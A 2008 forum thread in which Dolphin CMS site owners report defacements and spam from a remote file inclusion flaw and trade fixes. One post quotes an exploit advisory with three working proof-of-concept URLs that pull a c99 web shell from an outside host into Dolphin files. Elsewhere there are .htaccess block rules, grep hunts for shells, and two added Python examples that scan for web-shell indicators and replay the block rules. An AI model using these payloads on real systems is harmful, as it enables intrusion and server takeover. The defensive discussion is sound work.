Dolphin not secure?? Hacked!

Hi,

my site (v6.0.5) was hacked today! Now I read this article:

http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6128

Any solution????

9 Jul 2008

I have an idea for this. I will analyze it once again and come up with a fix.

Regards,

Praveen

http://www.dolphinpros.com

----
9 Jul 2008

We have a major problem with this too.  Boonex staff - any advice?  For now we have had to take Dolphin offline. The hackers are still trying to access, even though we have taken it offline, but they were able to compromise server due to this - seems to be a MAJOR problem.

Thank

10 Jul 2008

Can someone PLEASE post (or email me) the details from that page Singlemonster is referring to!! I'm not able to access that link but I would LOVE to know what it says!!

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
10 Jul 2008

The page says :

Name Of Script : Dolphin PHP

# Version : 6.1.2

# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip

# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]

# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]

# Type Of Exploit : RFI In Multiple Files

# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below

# POC :

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :)

# rXh

# bEST wISHES
# milw0rm.com [2008-07-08]

10 Jul 2008

And by the way this morning my community portal http://ecovoiceonline.org only had the text "Owned by Spanish Hackers" on the front page.

I opened my cpanel at Hostgator, looked at the index.php file, which had all the code deleted and replaced by the Spanish Hacker's text. I deleted the index.php file and uploaded a new index file from my backup and the site is up again.

But what scares me is not knowing where is the vulnerability and what to do to prevent further hacking.

10 Jul 2008

> And by the way this morning my community portal http://ecovoiceonline.org only had the text "Owned by Spanish Hackers" on the front page.
>
> I opened my cpanel at Hostgator, looked at the index.php file, which had all the code deleted and replaced by the Spanish Hacker's text. I deleted the index.php file and uploaded a new index file from my backup and the site is up again.
>
> But what scares me is not knowing where is the vulnerability and what to do to prevent further hacking.

Are you on a shared hosting account? I think I read where this happens on any shared hosting environment (VPS is included in shared). Yes the title, but anybody can change the title; read what it says after the "?": ?sIncPath=http://rxh.freehostia.com/shells/c99 - this was installed in the plugins directory from within the server, I can assure you of that.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
10 Jul 2008

> We have a major problem with this too.  Boonex staff - any advice?  For now we have had to take Dolphin offline. The hackers are still trying to access, even though we have taken it offline, but they were able to compromise server due to this - seems to be a MAJOR problem.
>
> Thank

Kev, where are you hosted at? Have your support run a search on all the files on the server and look for c99 or shell within the file. I will do it if you want me to and you have shell access?

later,
DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
10 Jul 2008

It's a definite security hole - we have had to disable the dolphin directory completely due to the mess these hackers have made - they are still trying to do more as we speak (Apache logs show them still hammering away, from different IPs all the time), but are locked out.

I'd recommend disabling your Dolphins until we hear news from Boonex on this (or at least do so at the first sign of trouble, and hope you didn't do so too late) - and send an email to Boonex too about it in case they see emails before forums.

10 Jul 2008

> We have a major problem with this too.  Boonex staff - any advice?  For now we have had to take Dolphin offline. The hackers are still trying to access, even though we have taken it offline, but they were able to compromise server due to this - seems to be a MAJOR problem.
>
> Thank
>
> Kev, where are you hosted at? Have your support run a search on all the files on the server and look for c99 or shell within the file. I will do it if you want me to and you have shell access?
>
> later,
> DosDawg

I have shell access - will check this out now - thanks.

Kev

10 Jul 2008

Oh by the way found the same security alert in http://securityreason.com/exploitalert/4285

10 Jul 2008

grepping for c99 turned up a lot of results - some very suspicious - I have techs checking them out now.

grepping for shell is showing a lot of hits but so far they seem like likely legitimate cases to me (inside buildapache, perlinstaller etc)

Kev

... Correction: seems not so suspicious after all.  Files listed were all either outside public access areas, or have legitimate use of c99, for example in hexcodes inside html files, jpg or gif files when searched as text, etc.  And nothing at all was inside the Dolphin directory (I was grepping the entire server).  Back to the drawing board I think.
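Added example (not code from the thread or from Kev): a Python scanner that does what the server-wide grep above was after, but only reads files that are text (no NUL bytes) and look like PHP, either by extension or because they open with a PHP tag. The hex colours inside HTML and the byte runs inside images that produced the false positives described above are therefore never examined, while a PHP file hiding behind a .txt name in an upload directory still is. The indicator patterns and the fixture tree it builds in a temporary directory are constructed for this example.

```python
"""Scan a web root for PHP-like text files carrying common web-shell indicators
(added example; the indicator list and fixture tree are constructed)."""
import os
import re
import tempfile

PHP_EXTENSIONS = {".php", ".inc", ".phtml", ".php3"}

# Indicator patterns (constructed for this example; extend from your own incidents).
INDICATORS = [
    ("c99 marker", re.compile(r"\bc99(?:shell)?\b", re.I)),
    ("eval(base64_decode(", re.compile(r"\beval\s*\(\s*base64_decode\s*\(")),
    ("exec function fed from request data",
     re.compile(r"\b(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
]


def is_text(data):
    """Treat anything with a NUL byte in its first 8 KiB as binary (images, archives)."""
    return b"\x00" not in data[:8192]


def looks_like_php(path, data):
    """PHP by extension, or any text file that opens with a PHP tag (e.g. a dropped .txt)."""
    ext = os.path.splitext(path)[1].lower()
    return ext in PHP_EXTENSIONS or data.lstrip().startswith(b"<?")


def scan_tree(root):
    """Return sorted (relative path, line number, indicator) triples for PHP-like text files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read()
            if not is_text(data) or not looks_like_php(full, data):
                continue  # binary blobs and plain HTML are never grepped
            for lineno, line in enumerate(data.decode("utf-8", "replace").splitlines(), 1):
                for label, rx in INDICATORS:
                    if rx.search(line):
                        findings.append((os.path.relpath(full, root), lineno, label))
    return sorted(findings)


# Constructed fixture: a clean PHP file, an HTML file with the hex colour #c99,
# a GIF-like binary containing the bytes "c99", a modified include file, and
# PHP hidden behind a .txt name in an upload directory.
FIXTURE = {
    "index.php": b"<?php\nrequire_once('inc/header.inc.php');\necho 'hello';\n",
    "templates/style.html": b'<div style="color:#c99;">hex colour, not a shell</div>\n',
    "media/images/logo.gif": b"GIF89a\x00\x00c99\xff\x00",
    "ray/modules/global/inc/content.inc.php":
        b"<?php\n// c99shell header (constructed indicator fixture)\n$p = 'ZGllKCk=';\neval(base64_decode($p));\n",
    "media/images/dropped.txt":
        b"<?php\n// PHP hiding behind a .txt name (constructed fixture)\npassthru($_GET['c']);\n",
}


def build_fixture(root):
    """Write the constructed tree under root."""
    for rel, content in FIXTURE.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)


def demo():
    """Build the fixture in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, lineno, label in demo():
        print(f"{path}:{lineno}: {label}")
```

Point it at a real web root by calling scan_tree(path) instead of demo(); anything it reports still needs a human look, since a legitimate file can mention c99 in a comment, but the binary and HTML noise is gone.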

10 Jul 2008

> grepping for c99 turned up a lot of results - some very suspicious - I have techs checking them out now.
>
> grepping for shell is showing a lot of hits but so far they seem like likely legitimate cases to me (inside buildapache, perlinstaller etc)
>
> Kev
>
> ... Correction: seems not so suspicious after all.  Files listed were all either outside public access areas, or have legitimate use of c99, for example in hexcodes inside html files, jpg or gif files when searched as text, etc.  And nothing at all was inside the Dolphin directory (I was grepping the entire server).  Back to the drawing board I think.

I will look at this further and report back; I might need to look up some of the source code that is used within that file.

holla,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
10 Jul 2008

Damn it! Yeah, after it is posted on one "security site" (which are normally really hacker sites) it will spread like wild fire... I'm at work right now so I don't have the exact code but I have RFI blocked on all my sites through the .htaccess .. It's simple to do, all you have to do is block any command line that has http, https, or ftp in it. So even if someone finds a vulnerable file and then types "http://www.yoursite.com/vulnerablefile.php?http://www.hackersite.com/c99" they will get a 500 server error because it had http in the command line after the file.

This DOES screw up some legitimate things.. like I can't put a google search bar on my sites because google passes info in that same manner... but for me it is worth it to not constantly worry about someone finding something like this and using it :-)

I'll post the code when I get home.

By the way, aren't you guys amazed that when something like this pops up half the people here ignore it??

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
10 Jul 2008

Humorous hackers :)
Has anybody read this before?
http://www.php.net/register_globals manual

It's not an exploit, it's just a lack of PHP < version 4.2
Previous PHP couldn't accept any GET/POST variables, and developers of PHP invented something new, hah

So......,

>When on, register_globals will inject your scripts with all sorts of variables

and it was possible to override variables and functions,

this is not a lack of our Dolphin,

Since the first Dolphin version we provide manual on how to switch off this php option, just check your:

.htaccess

there is a line:

php_flag register_globals Off

More, developers of PHP disable this option in distrib since 4.2 (seems)

So we don't see here any issue for this

Check the PHP history and I'm sure, you'll find a lot of useful information about it.

This was a common PHP language problem, its earliest problems.

10 Jul 2008

> since first versions of dolphin we provide manual switching off this option of php, just check yours:
>
> .htaccess
>
> here always line:
>
> php_flag register_globals Off

Hey AndreyP,

thanks for this hint!

I checked my other dolphin project running 6.0003 and there it is inside the .htaccess. Then I checked my freshly installed .htaccess and there was no php_flag register_globals Off inside.

So I just put the line inside and that's it.

Maybe you can write it back to the default .htaccess.

Greets,

Jerry

10 Jul 2008

So basically one php setting determines if your site is "hack proof" or "hack friendly".. ooookkkkkk. For those of you who want to block ALL "remote file include" attempts put this in your .htaccess inside the mod_rewrite block:

RewriteCond %{QUERY_STRING} ^http   [OR]
RewriteCond %{QUERY_STRING} ^.+www\.  [OR]
RewriteCond %{QUERY_STRING} ^.+https  [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

This will block any "query string" that has http, https, ftp, or www in it. It will also block ANY user agent that starts with "libwww" (which is what 99% of these bad bots use) and "Wget" (which is a site scraper).

If you use anything on your server that gets files by the command line you can't use this because it will block that too.. like www.yoursite.com/filegetter.php?file=http://www.yourothersite.com/display.txt but I only know of a few things that work that way (Google search bar for one).

thanks

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
10 Jul 2008

> Humorous hackers :)
> Has anybody read this before?
> http://www.php.net/register_globals manual
>
> It's not an exploit, it's just a lack of PHP < version 4.2
> Previous PHP couldn't accept any GET/POST variables, and developers of PHP invented something new, hah
>
> So......,
>
> >When on, register_globals will inject your scripts with all sorts of variables
>
> and it was possible to override variables and functions,
>
> this is not a lack of our Dolphin,
>
> Since the first Dolphin version we provide manual on how to switch off this php option, just check your:
>
> .htaccess
>
> there is a line:
>
> php_flag register_globals Off
>
> More, developers of PHP disable this option in distrib since 4.2 (seems)
>
> So we don't see here any issue for this
>
> Check the PHP history and I'm sure, you'll find a lot of useful information about it.
>
> This was a common PHP language problem, its earliest problems.

Can I clarify please:

1.  Is this the official Boonex response  (I do not know if you are Boonex staff)?

2.  You say it is just an issue of register_globals vulnerability, but that .htaccess supplied with the script has a flag to turn it off anyway, so it shouldn't be a problem.  I have just checked the .htaccess in the main directory of our dolphin installation and there is no php_flag for reg_globals there. Or perhaps I am misunderstanding you - you may be saying we should add the flag there ourselves? (If so, why not just add it into the distributed file package?)

3.  As I understand it, register_globals is a problem because it opens holes for poorly written code to expose vulnerabilities - Register_Globals does not expose any vulnerabilities unless the script allows it to.  So surely a more mature response is to close the hole - so that it doesn't matter if register_globals is on or off.

In a perfect world, sure, the simple solution is to just turn off register_globals on the server.  But this ignores the fact that there a great many sites running scripts that still depend on it (and many of those do not necessarily have gaping security holes).

When the hackers list it as a vulnerability they are correct.  If register_globals needs to be off in order to run the script safely, that really REALLY needs to be spelled out as a REQUIREMENT of the script.

I just can't understand - why not make the script safe, rather than have a need to have register_globals off (something that most end-users would not have the slightest idea about and would not understand if you explain it to them)?

Would like your thoughts on this - thanks.

10 Jul 2008

I have the same problem. My provider wrote me an email that someone spread out spam by my site. The problem file is: /ray/modules/global/inc/content.inc.php.


They closed the hole temporarily with the following lines in the .htaccess

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]
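Added example (not code from the thread, from Mike, or from the hosting provider): a Python script that replays the two .htaccess rule sets posted in this thread, Mike's RewriteCond patterns on QUERY_STRING and HTTP_USER_AGENT and the provider's case-insensitive =http / urlx= patterns, against a handful of constructed Apache access-log lines. The IPs are from the RFC 5737 documentation ranges and the remote hosts use the reserved .invalid domain, so nothing here is a real indicator. Running it shows that Mike's set blocks a query string only when it begins with http or contains www., https or ftp after its first character, so a request such as ?sIncPath=http://host/file.txt? with no www. in the remote URL passes through, while the provider's =http rule catches it; both sets also block the legitimate filegetter.php?file=http://www... case Mike describes.

```python
"""Replay the two .htaccess RFI rule sets from the thread against sample log lines
(added example; the log lines, hosts and addresses are constructed)."""
import re

# Constructed Apache combined-log lines. Hosts under .invalid and the
# 203.0.113.0/24 and 198.51.100.0/24 addresses are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2008:10:01:02 +0000] "GET /ray/modules/global/inc/content.inc.php?sIncPath=http://example.invalid/c99.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.6 - - [10/Jul/2008:10:01:05 +0000] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.example.invalid/c99.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Jul/2008:10:02:11 +0000] "GET /filegetter.php?file=http://www.otherhost.invalid/display.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Jul/2008:10:03:00 +0000] "GET /search.php?q=dolphin+hosting HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2008:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Wget/1.10.2"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Mike's rules. A RewriteCond pattern is a regex applied with search semantics
# to the named server variable; without [NC] it is case-sensitive.
MIKE_RULES = [
    ("QUERY_STRING ^http", "query", re.compile(r"^http")),
    ("QUERY_STRING ^.+www\\.", "query", re.compile(r"^.+www\.")),
    ("QUERY_STRING ^.+https", "query", re.compile(r"^.+https")),
    ("QUERY_STRING ^.+ftp", "query", re.compile(r"^.+ftp")),
    ("HTTP_USER_AGENT ^libwww", "ua", re.compile(r"^libwww")),
    ("HTTP_USER_AGENT ^Wget", "ua", re.compile(r"^Wget")),
]

# The hosting provider's rules; [NC] makes them case-insensitive.
HOST_RULES = [
    ("QUERY_STRING =http", "query", re.compile(r"=http", re.I)),
    ("QUERY_STRING urlx=", "query", re.compile(r"urlx=", re.I)),
]


def parse_line(line):
    """Split one combined-log line into target, path, query string and user agent."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "target": m.group("target"),
            "path": path, "query": query, "ua": m.group("ua")}


def matched_rules(req, rules):
    """Names of the rules whose pattern matches the request's field."""
    return [name for name, field, rx in rules if rx.search(req[field])]


def evaluate(log_text, rules):
    """Map each request target to the rules that would block it (empty list = passes)."""
    results = {}
    for line in log_text.splitlines():
        req = parse_line(line)
        if req:
            results[req["target"]] = matched_rules(req, rules)
    return results


def unblocked_by(log_text, rules):
    """Sorted targets that a rule set lets through."""
    return sorted(t for t, hits in evaluate(log_text, rules).items() if not hits)


if __name__ == "__main__":
    for label, rules in (("Mike's rules", MIKE_RULES), ("Host's rules", HOST_RULES)):
        print(label)
        for target, hits in evaluate(SAMPLE_LOG, rules).items():
            print("  ", "BLOCK" if hits else "pass ", target, hits)
```

Mike's ^http only fires when the query string itself begins with http (a bare ?http://... after the script name), which is why the provider's =http form is the more general check for parameters that carry a URL; the price, as both posts say, is that any parameter that legitimately carries a URL is refused as well.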
10 Jul 2008

I got the same little problems with both on my Dolphin site this morning, the ID 1 accounts had different passwords. I had to change both.

Kids first
10 Jul 2008

What happens if you are on a shared server like Yahoo and they don't allow you to use .htaccess files? How do I close this security breach?

The culprit definitely is /ray/modules/global/inc/content.inc.php. 

Do I just overwrite this with a fresh content.inc.php file and I'm good or do I need to do something inside of this file to safeguard myself again?

I'm afraid to find out what has happened to the site once i get it back up and running!

Dolaugh

10 Jul 2008

> I have the same problem. My provider wrote me an email that someone spread out spam by my site. The problem file is: /ray/modules/global/inc/content.inc.php.
>
> They closed the hole temporarily with the following lines in the .htaccess
>
> RewriteEngine On
> RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
> RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
> RewriteRule ^(.*) - [F]

This type of approach - also touched on earlier by mscott, gives me an idea.

Would it not be possible to use a similar rule in .htaccess to grab the URL and/or IP address and then pass them to a php file (or other approach) which could in turn block them as mod_sec rules or add to iptables?  Seems to me like there would be permission issues though - beyond my ability in PHP or regular expression writing.

Another thing is an issue of folders with 777 perms - can anyone confirm that a fresh install/upgrade of Dolphin does not leave any folders like cache and lang with permissions of 777?  I seem to recall when I installed, that the list of folders you need to set to 777 for the install was quite long, but the list of folders the install program tells you to set back to 755 afterwards is quite short.  Wouldn't this also be a security concern?

Thank

10 Jul 2008

> What happens if you are on a shared server like Yahoo and they don't allow you to use .htaccess files? How do I close this security breach?
>
> The culprit definitely is /ray/modules/global/inc/content.inc.php.
>
> Do I just overwrite this with a fresh content.inc.php file and I'm good or do I need to do something inside of this file to safeguard myself again?
>
> I'm afraid to find out what has happened to the site once i get it back up and running!
>
> Dolaugh

/ray/modules/global/inc/content.inc.php is only one of the files we have seen targeted.

Some others include:

/news/plugins/safehtml/HTMLSax3.php?dir[plugins]=

and also the main index.php if I remember right.

10 Jul 2008

Yes the main index.php file was targeted for me yesterday - MESSAGE for index file is generally "This Site is now Owned by Spanish Hackers"....today it was : /ray/modules/global/inc/content.inc.php with the wording " helppppp them!!!!


HOW would someone who doesn't use .htaccess files keep these files from being hacked?? Any ideas? Someone surely has a solution they could offer besides changing WEB hosts! LOL

I swear...this is such a burden....

DoLaugh

10 Jul 2008

> Yes the main index.php file was targeted for me yesterday - MESSAGE for index file is generally "This Site is now Owned by Spanish Hackers"....today it was : /ray/modules/global/inc/content.inc.php with the wording " helppppp them!!!!
>
> HOW would someone who doesn't use .htaccess files keep these files from being hacked?? Any ideas? Someone surely has a solution they could offer besides changing WEB hosts! LOL
>
> I swear...this is such a burden....
>
> DoLaugh

That is tricky.  Changing hosts is definitely the number 1 thing I'd suggest.  But you could also ask your current host to turn off Register_Globals locally for your account if they have it on server wide.  We are looking into mod_security as another option, but that wouldn't be much use to you I'm afraid.

Other than that, you are describing an excellent example of why I am saying the solution is for Boonex to fix the code itself rather than rely on the bandaid approach of turning register_globals off.  We will have to see how they respond.

10 Jul 2008

My website also got hacked today. Got a warning from host that we are spamming. Apparently hackers were spamming on our behalf, how nice of them. Here is the message: http://abuseinfo.iecc.com/khv/8477716

Any ideas? How to patch this up?

10 Jul 2008

My site http://ecovoiceonline.org appears to have got hacked again. This morning all I see is the message :

not be removed from the source code.
Warning: Cannot modify header information - headers already sent by (output started at /home/mokhsein/public_html/ecovoiceonline/ray/modules/global/inc/content.inc.php:1) in /home/mokhsein/public_html/ecovoiceonline/inc/design.inc.php on line 495

Fatal error: Call to undefined function getrayintegrationjs() in /home/mokhsein/public_html/ecovoiceonline/inc/design.inc.php on line 425

I tried uploading a new design.inc.php file and also ray/modules/global/inc/content.inc.php and it's ok now. How long do we have to keep doing this kind of piecemeal repair jobs?

11 Jul 2008

I was targeted as well.  Seems to be same group just different angles.  This is what they have left for me:

Hacked By SnL_ayaz_

Turkish Hacker

One Turk-Against The World-No War-Forever World Peace

mail to:SnL_ayaz_@hotmail.com

websites:http://bilginin--adresi.blogspot.com Bilginin Adresi Bilginin Tek Kaynağı
Warning: main(BX_DIRECTORY_PATH_INCprofiles.inc.php): failed to open stream: No such file or directory in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26

Fatal error: main(): Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/local/lib/php:/usr/local/share/pear') in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26

They have replaced my inc/header.inc.php.

Any ideas on how I restore it, and how I keep it from happening again?

Thanks,

Roy

11 Jul 2008

> I was targeted as well.  Seems to be same group just different angles.  This is what they have left for me:
>
> Hacked By SnL_ayaz_
>
> Turkish Hacker
>
> One Turk-Against The World-No War-Forever World Peace
>
> mail to:SnL_ayaz_@hotmail.com
>
> websites:http://bilginin--adresi.blogspot.com Bilginin Adresi Bilginin Tek Kaynağı
> Warning: main(BX_DIRECTORY_PATH_INCprofiles.inc.php): failed to open stream: No such file or directory in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26
>
> Fatal error: main(): Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/local/lib/php:/usr/local/share/pear') in /hsphere/local/home/rprinc/windpsalms.com/admin/index.php on line 26
>
> They have replaced my inc/header.inc.php.
>
> Any ideas on how I restore it, and how I keep it from happening again?
>
> Thanks,
>
> Roy

Need to switch to a host where the server is tighter than a dick's hatband? Give me a shout. Monitored 24/7 for events of this magnitude.

Shared hosting account, obviously. Give me a shout, man, and see if we can get you fixed up.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
11 Jul 2008

Hmmm, what hypocrisy!

His actions are not really conducive to "No War - Forever World Peace", are they?

11 Jul 2008

Is Boonex not concerned with this problem?

11 Jul 2008

Ohh again :)

why can't you even go to

Members -> Boonex Team

Here are all Boonex staff, thanks for all

so again,

you should have

php_flag register_globals Off
to prevent been hacked

all hosts must provide this variable as 'Off' by default.

If not - this is not secure host

If your hosting doesn't give the possibility to use .htaccess, ask your host to enable this possibility and even switch

php_flag register_globals Off
this is a common security issue, strange that your host doesn't provide this; which version of PHP does it use? 3.0? :)

since 4.2 this variable is Off as default

Regards,

BoonEx staff

11 Jul 2008

I just asked my host to switch globals off.  They are more concerned now with the security gaps in the software.  The hackers upon investigation have been having a field day.  Thanks to DosDawg we have found the hackers files.  They have complete control over everything, including passwords, webshell, user info, email parsing, and sadly open ports straight into my users computers who are on line and may not have proper firewalls.  This is pretty bad.  Turning globals off did not work we were still able to access the software and control whatever we wanted. 

I can remove the software, I am going to place all the security measures mentioned here.  Please, please, please tell me someone how do I recreate the header.inc.php?

Thank you,

Roy

P.S.  please do not tell me a complete new install.

11 Jul 2008

hello,

thanks for the info!

http://handytariftipp.de/
11 Jul 2008

> Humorous hackers :)
> Has anybody read this before?
> http://www.php.net/register_globals manual
>
> It's not an exploit, it's just a lack of PHP < version 4.2
> Previous PHP couldn't accept any GET/POST variables, and developers of PHP invented something new, hah
>
> So......,
>
> >When on, register_globals will inject your scripts with all sorts of variables
>
> and it was possible to override variables and functions,
>
> this is not a lack of our Dolphin,
>
> Since the first Dolphin version we provide manual on how to switch off this php option, just check your:
>
> .htaccess
>
> there is a line:
>
> php_flag register_globals Off
>
> More, developers of PHP disable this option in distrib since 4.2 (seems)
>
> So we don't see here any issue for this
>
> Check the PHP history and I'm sure, you'll find a lot of useful information about it.
>
> This was a common PHP language problem, its earliest problems.

Just a lack of PHP?

Curious: my provider uses PHP Version 5.2.5 and register_globals is OFF and my site was hacked.

What now? You said I can't be hacked with PHP > 4.2 and register_globals OFF?!?!

Cheers

11 Jul 2008
Hello tomsche! You should also check permissions for inc and periodic folders (should be 755), files periodic/*.php, ray/modules/global/inc/header.inc.php (should be 644) after installation. Provide me your FTP access and if possible server logs in day of hack, we'll investigate it for getting exact reason. Regards
11 Jul 2008

I completed a new test install to see what folders are left as 777 permissions - even after the recommended steps of resecuring as per the installation instructions.  This is the list I find are still 777:

# find . -perm 777 -type d

./ray/modules/board/files
./ray/modules/chat/files
./ray/modules/im/files
./ray/modules/movie/files
./ray/modules/mp3/files
./ray/modules/music/files
./orca/cachejs
./orca/classes
./orca/conf
./orca/js
./orca/layout
./orca/log
./media/images
./media/images/banners
./media/images/blog
./media/images/classifieds
./media/images/gallery
./media/images/profile
./media/images/profile_bg
./media/images/promo
./media/images/promo/original
./media/images/sdating
./media/images/sharingImages
./media/sound
./media/video
./langs
./groups/gallery
./groups/orca/cachejs
./groups/orca/classes
./groups/orca/js
./groups/orca/layout
./groups/orca/log
./cache

Are these not serious insecurities?  Is it necessary to secure these directories in other ways.

Thank

11 Jul 2008

Hi,

I mentioned this to Hostmonster tech support this afternoon and they said register_globals is off by default with them.

When I sent them that astalavista link they said this -

[11:55:30 AM]: Hmm

[11:55:56 AM]: Any shared host is going to have those vulnerabilities, whether it's us, Ipower, GoDaddy, Network Solutions, etc.

[11:56:09 AM]: And even then, nothing's ever hack-free.

Interesting.

Cheers

Max

11 Jul 2008

This is not Boonex's problem but rather server hardening and security issues. Even so, servers can never be 100% fool-proof. No matter what you do, hackers will try and hack your server daily. We run shared hosting for dolphin and this is what we have done to minimize server intrusions.

1) Global Register set to "OFF"

2) Mod Security Installed on cpanel

3) Install SUPHP on server

4) Enable firewall to immediately block the intruder

Enable Mod Security to block the following:

a) SQL injection

b) Shell Script execution, especially malicious ones that run spam

c) External circumvention of URL links, especially ones that link to .txt

d) Enable automatic blockage in Mod Security settings when a hack is attempted

Of all the methods above we have found that mod security works the best in our situation. If you are running a dedicated server, have your system admin implement security hardening on your server.

11 Jul 2008

I have several Dolphin sites that were also hacked.

I received an email from my hosting provider that stated: "Your hosting account has been attacked by an insecure php script. As a result of this attack a large amount of spam has been sent by the following script: /plugins/tiny_mce/sendmail.php".

After investigation my host reported "The intrusion was processed through your script /ray/modules/global/inc/content.inc.php".

I am no expert, but I would assume that many of us are hosted on various different providers. I have a little problem with the notion that we are expected to believe that all those many hosting providers are at fault when Dolphin is the common denominator throughout.

11 Jul 2008

Exactly my own thoughts Dwain!

Here's what Hostgator just had to say about 777 directory permissions:

Hostgator: Welcome to HostGator Live Chat, how may I assist you?

RB: Hi! (and thanks) .... What are the "REAL and ACTUAL" dangers of having 777 directory permissions please?

Hostgator: With permissions set to 777, you allow access of external users to your files to read, write and execute files as they please. In other words an external user can edit your files within the server having these permissions and do many other things with it. It inevitably compromises your files and your account in general.

RB: But they have to have REAL access to it correct ? i.e. through shell or ftp, etc?  Can they do anything through an external http web browser?

Hostgator: If they ftp through a browser to that account and the permissions are compromised then they may be able to modify certain contents of the directory. And this can be done even if they do not have shell access.

RB: ok thanks! Have a great day!


Any reason that the installations cannot run with 755 permissions which goes without saying would be MUCH safer?


What now ye say Boonex???

11 Jul 2008

I haven't been telling this since Dolphin 6.0, but nobody gives a damn. Dolphin uses too many fwrite, fopen and file functions, which open doors to security threats and also burden the server.

11 Jul 2008

Kill your Dolphin! It is NOT SAFE!

My Dolphin was hacked and many malicious php scripts uploaded to my server.

The Boonex techs don't respond, and not seem to care that their script is VERY VULNERABLE!

Switch social networking scripts now!

12 Jul 2008

Of all those who proclaim they have been hacked, please provide us with who your host is, and I would also like to look at your phpinfo(). Yeah, the host tells you that register_globals=OFF, but have you verified that? There are a few scripts that require register_globals to be on; exactly why, I do not know, but those are scripts I would not run.

I'm just curious as to where all of you guys are hosted, and would like to verify that register_globals=OFF. So I see what AndreyP is posting; I know on tallyplayer his register_globals were on. I am sure he believed them to be turned off, but you will find that if James, with a hosting account that he is paying 25 dollars a month for, is asking for register_globals to be turned on, and you are hosting on that same account for $1.99 and you want register_globals to be off, what do you think they are going to do?

Well, I can tell you it's evident: when in Rome do as the Romans. They turn them on, and expecting you to never view your phpinfo() nor read your server logs, they just get away with it.

Well, that is just my 3 cents worth. Gotta go, got things to do. Good luck to all, and hope things shake out.

later,
DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

Ok the reason for the mass hackings is last week a hacker group put out one of those "security alerts" for Dolphin 6.1.2... for anyone who isn't familiar with this process here is how it works:

1. A REAL hacker downloads a piece of software and pours over the code until he finds a file that is vulnerable to RFI, XSS or SQL injection.

2. He posts a "security alert" (or whatever you want to call it) on one of the major hacker sites (like milw0rm) to impress his peers. Some of these sites are openly for hackers, others are made to look like security sites.

3. The advisory spreads like wildfire because almost all these sites pull their info from the same spot.

4. Someone writes an automated program to search for the sites on Google  and "deface" them.

5. Thousands of "script kiddies" download this program and let it go (with their own "payload" like "You have been pwned by spanish hackers").. these automated programs run around the clock until the kids get tired and move on.

What NORMALLY happens (like with phpbb or Joomla) is the developers release a patch within 24 hours to patch the hole... but this advisory came out on 7/08/08 . And YES this does happen to lots of software developers, but this is the FIRST time I have ever seen it handled in this manner.

Now to cover several of the posts:

